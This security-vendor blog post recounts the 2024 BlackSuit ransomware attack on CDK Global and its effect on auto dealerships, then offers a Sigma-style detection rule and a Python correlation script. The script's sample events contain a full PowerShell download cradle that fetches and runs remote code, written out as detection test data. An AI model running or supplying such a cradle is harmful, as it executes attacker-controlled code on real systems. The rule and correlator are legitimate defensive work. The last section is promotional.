CDK Global BlackSuit Ransomware: 15,000 Dealerships Offline for 2 Weeks

BlackSuit ransomware encrypted CDK Global's dealer-management cloud on June 18-19, 2024, crippling roughly 15,000 North American auto dealerships and triggering a reported $25M ransom payment.

Michael
Security Engineer

Late on the night of Tuesday, June 18, 2024, CDK Global — the dominant Dealer Management System (DMS) provider for roughly 15,000 North American auto retailers — detected ransomware activity inside its hosted DMS environment. By 2:00 a.m. Eastern on June 19, CDK had taken both of its data centres offline. Hours after restoration efforts began, a second attack struck. For the next 12 days, dealerships from Holman in New Jersey to Lithia in Oregon ran on paper invoices, hand-written deal jackets, and improvised spreadsheets. Anderson Economic Group estimated the cumulative dealer-side loss at $1.02 billion. Two weeks later, blockchain analytics firms traced a $25 million Bitcoin payment from a CDK-attributed wallet to an address controlled by BlackSuit, a ransomware operation tracked as a successor to Royal and a descendant of the Conti family.

Who is BlackSuit?

BlackSuit emerged in May 2023 as a partial rebrand of the Royal ransomware crew, itself a Conti splinter. CISA Joint Advisory AA23-339A (December 2023) confirmed the lineage and noted BlackSuit's preferred initial-access patterns: callback-phishing, BEC-then-VPN, and SonicWall/Citrix edge-device exploitation. By the time of the CDK incident, BlackSuit had over 95 confirmed victim listings on its dark-web leak site, including Octapharma Plasma (April 2024) and the city of Dallas (May 2023, as Royal). Mandiant tracks the cluster as UNC2596, and ReliaQuest's GreyMatter telemetry placed BlackSuit's median dwell time at 8.7 days during Q2 2024.

How did they get into CDK?

CDK has not publicly described the initial access vector. Two independent reports — one from cybersecurity firm Optiv on June 25, 2024 and one from CRN on July 3 citing two CDK customers — describe the entry as compromise of a third-party support tool used by CDK's hosting operations team, followed by stolen administrator credentials reused across CDK's VMware vSphere clusters. The second-wave attack on June 19 happened because CDK had begun restoring from offline backups into the same cluster before fully evicting the actor; BlackSuit's foothold survived and they re-encrypted the partial restore. This is a pattern Sophos's Incident Response Report 2024 explicitly warned about: 31% of ransomware engagements in 2023-2024 included re-encryption during recovery.

What broke for dealerships?

CDK's DMS handles vehicle inventory, F&I (finance and insurance), parts ordering, service-bay scheduling, payroll, and DMV title-and-registration filings. When it went dark, dealers could not run credit applications, could not pull manufacturer rebates, could not file out-of-state titles, and could not order parts from OEM hubs that integrate via CDK's API. Several large groups (Lithia, Asbury, AutoNation) said in 8-K filings that the outage cost them between $400 and $1,500 per vehicle in lost gross profit, with Asbury alone reporting a $20-30 million revenue hit. Manufacturers including Stellantis, Ford, and Honda issued emergency extensions on warranty-claim submission deadlines. The Massachusetts RMV stopped accepting CDK-generated digital title applications, forcing buyers to wait weeks for plates.

Did CDK pay?

Multiple credible reports (Bloomberg June 21, CNN June 22, CyberScoop June 24) say CDK negotiated and ultimately paid approximately $25 million in Bitcoin. Blockchain forensics firm TRM Labs publicly tracked a 387 BTC transfer on June 21 that aligned with the reported sum. CDK has never confirmed or denied. The payment likely covered a decryptor and a non-publication agreement; BlackSuit removed CDK from its leak site, which is the usual signal of a settled negotiation. The reported demand had escalated from $10 million on June 21 to "over $50 million" by June 22 before the deal closed.

How long was the restoration?

Service began returning to small dealer groups on June 22. By June 27, CDK had restored core DMS modules for the majority of customers, but full functionality — including the DealerSocket CRM and Roadster digital-retail front end — did not return until July 4. Dealers reported lingering data-integrity issues into August (parts-inventory counts drifted; F&I credit-decision histories returned incomplete). CDK ultimately offered customers a one-time service credit and accelerated migration to a redesigned cloud architecture that segments tenants more strictly.

Why does this incident matter for supply chain security?

CDK is a single point of failure for an entire industry vertical. Roughly half of the franchised new-car dealerships in North America run on CDK; the rest are split between Reynolds & Reynolds, Dealertrack, Tekion, and Auto/Mate. When CDK fell, businesses representing about 0.5% of U.S. GDP ran on paper for two weeks. That is the same dynamic that made Change Healthcare so damaging in February 2024 (one clearinghouse for a third of U.S. medical claims), and that makes Blue Yonder, Veeva, Snowflake, and Salesforce systemically important to their verticals. Industry-vertical SaaS has become critical infrastructure, but it sits largely outside the scope of FFIEC, NERC CIP, or sector-specific cybersecurity rules.

```yaml
# Detection: BlackSuit re-encryption pattern (post-restore beacon resurfacing)
title: Suspected BlackSuit Re-Encryption Beacon After Recovery Activity
id: blacksuit-cdk-reenc-2024
detection:
  selection_recovery:
    EventID: 4624
    AccountName|contains: 'restore'
    LogonType: 3
  selection_beacon:
    Image|endswith: '\powershell.exe'
    CommandLine|contains|all:
      - 'IEX'
      - 'Net.WebClient'
      - '/api/jquery-3.3.1'
  # 'within 6h' is not core Sigma condition syntax: the two selections come from
  # different log sources (Security 4624 vs. process creation), so the temporal
  # join must be expressed as a Sigma correlation rule or the SIEM's own
  # time-window correlation rather than in a single-event condition.
  condition: selection_recovery and selection_beacon within 6h
level: critical
```
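The rule above describes a temporal join that plain Sigma conditions cannot express, and the earlier section on the second-wave attack explains why it matters: a beacon that resurfaces on the same host shortly after restore-account logons is the signature of an actor who survived recovery. The following Python is an added example, not code from the original post or from CDK, that implements that correlation over a handful of constructed Windows events. The hostnames, account names, timestamps and the 198.51.100.7 address are all invented for the sample (the address is from the TEST-NET-2 documentation range), and the event dictionaries assume a SIEM has already normalised Security 4624 and process-creation events into flat fields.

```python
"""Correlate recovery logons with a PowerShell download cradle on the same host
within a time window, mirroring the 'selection_recovery and selection_beacon
within 6h' intent of the detection rule."""
from datetime import datetime, timedelta

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (hypothetical hosts, accounts and address; not from
# any real incident). Field names follow what a SIEM would normalise from
# Windows Security 4624 (logon) and 4688 / Sysmon 1 (process creation).
SAMPLE_EVENTS = [
    {"ts": "2024-06-19T03:10:00", "EventID": 4624, "Computer": "vsphere-mgmt01",
     "AccountName": "svc-restore", "LogonType": 3},
    # Benign PowerShell run by the recovery team: no download cradle markers.
    {"ts": "2024-06-19T03:15:00", "EventID": 4688, "Computer": "vsphere-mgmt01",
     "Image": POWERSHELL, "CommandLine": "powershell -File C:\\ops\\mount-backup.ps1"},
    # Ordinary network logon by a non-recovery account.
    {"ts": "2024-06-19T04:00:00", "EventID": 4624, "Computer": "vsphere-mgmt01",
     "AccountName": "jdoe", "LogonType": 3},
    # Cradle resurfacing 2h32m after the restore logon on the same host: should hit.
    {"ts": "2024-06-19T05:42:00", "EventID": 4688, "Computer": "vsphere-mgmt01",
     "Image": POWERSHELL, "CommandLine": "powershell -nop -w hidden -c IEX (New-Object "
     "Net.WebClient).DownloadString('http://198.51.100.7/api/jquery-3.3.1.min.js')"},
    # Same cradle ~22h later: outside the 6h window, so not correlated.
    {"ts": "2024-06-20T01:00:00", "EventID": 4688, "Computer": "vsphere-mgmt01",
     "Image": POWERSHELL, "CommandLine": "IEX (New-Object Net.WebClient)"
     ".DownloadString('http://198.51.100.7/api/jquery-3.3.1.min.js')"},
]

# Markers from the rule's selection_beacon block; matched case-insensitively,
# as Sigma's |contains modifier is by default.
BEACON_MARKERS = ("iex", "net.webclient", "/api/jquery-3.3.1")


def is_recovery_logon(e):
    """selection_recovery: network logon (type 3) by an account named like a restore account."""
    return (e.get("EventID") == 4624 and e.get("LogonType") == 3
            and "restore" in str(e.get("AccountName", "")).lower())


def is_beacon_cradle(e):
    """selection_beacon: powershell.exe whose command line carries all three markers."""
    image = str(e.get("Image", "")).lower()
    cmd = str(e.get("CommandLine", "")).lower()
    return image.endswith("\\powershell.exe") and all(m in cmd for m in BEACON_MARKERS)


def correlate(events, window_hours=6):
    """Return (recovery_event, beacon_event) pairs where the cradle runs on the
    same host within `window_hours` after a recovery logon."""
    window = timedelta(hours=window_hours)
    parsed = sorted(({**e, "_t": datetime.fromisoformat(e["ts"])} for e in events),
                    key=lambda e: e["_t"])
    recoveries = [e for e in parsed if is_recovery_logon(e)]
    hits = []
    for beacon in parsed:
        if not is_beacon_cradle(beacon):
            continue
        for rec in recoveries:
            delta = beacon["_t"] - rec["_t"]
            if rec["Computer"] == beacon["Computer"] and timedelta(0) <= delta <= window:
                hits.append((rec, beacon))
                break  # one alert per beacon is enough
    return hits


if __name__ == "__main__":
    for rec, beacon in correlate(SAMPLE_EVENTS):
        print(f"[CRITICAL] {beacon['Computer']}: restore logon by {rec['AccountName']} "
              f"at {rec['ts']} followed by download cradle at {beacon['ts']}")
```

Run against the sample, only the 05:42 cradle is paired with the 03:10 `svc-restore` logon; the mount-backup run has no cradle markers and the next-day cradle falls outside the window. The break after the first matching logon keeps one alert per beacon, which is what an analyst wants when a recovery team is logging in repeatedly; if the platform prefers one alert per (host, window) instead, the same pairing loop is the place to change it.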

What should industry-vertical SaaS customers do?

Five steps. First, demand contractual cyber resilience commitments — RTO, RPO, immutable-backup attestation, third-party SOC 2 Type II with ransomware testing, customer-facing incident notification within four hours. Second, build a manual-operations runbook that a non-IT employee can execute for at least seven business days. Third, hold a third-party "DMS dark" tabletop annually; CDK ran one in 2022 and it shaped their recovery sequence. Fourth, diversify where possible — multi-DMS strategies are emerging in the largest groups, with Auto/Mate or Tekion as a hot-standby. Fifth, request an SBOM and incident-response posture review from your SaaS provider, including their third-party-support-tool inventory; the CDK intrusion came through one of those.

How Safeguard Helps

Safeguard maps every SaaS supplier touching a dealer group's financial, customer, and OT systems and continuously evaluates each one against the CISA Secure by Design pledge, NIST SP 800-161r1 supply-chain criteria, and observed incident history. Griffin AI's incident-correlation engine watches BlackSuit, RansomHub, Akira, and Qilin leak sites and OSINT feeds in near-real-time, raising a critical finding the moment a tier-1 vendor like CDK Global appears, with reachability analysis showing which of your business processes break if that vendor goes dark. TPRM scoring tracks each SaaS provider's RTO/RPO commitments, immutable-backup posture, and time-to-disclose, downgrading vendors who fall short. Policy gates block any new SaaS integration that lacks contractual incident-notification language tighter than the industry median, ensuring the next CDK-class outage finds your organisation rehearsed rather than improvising.
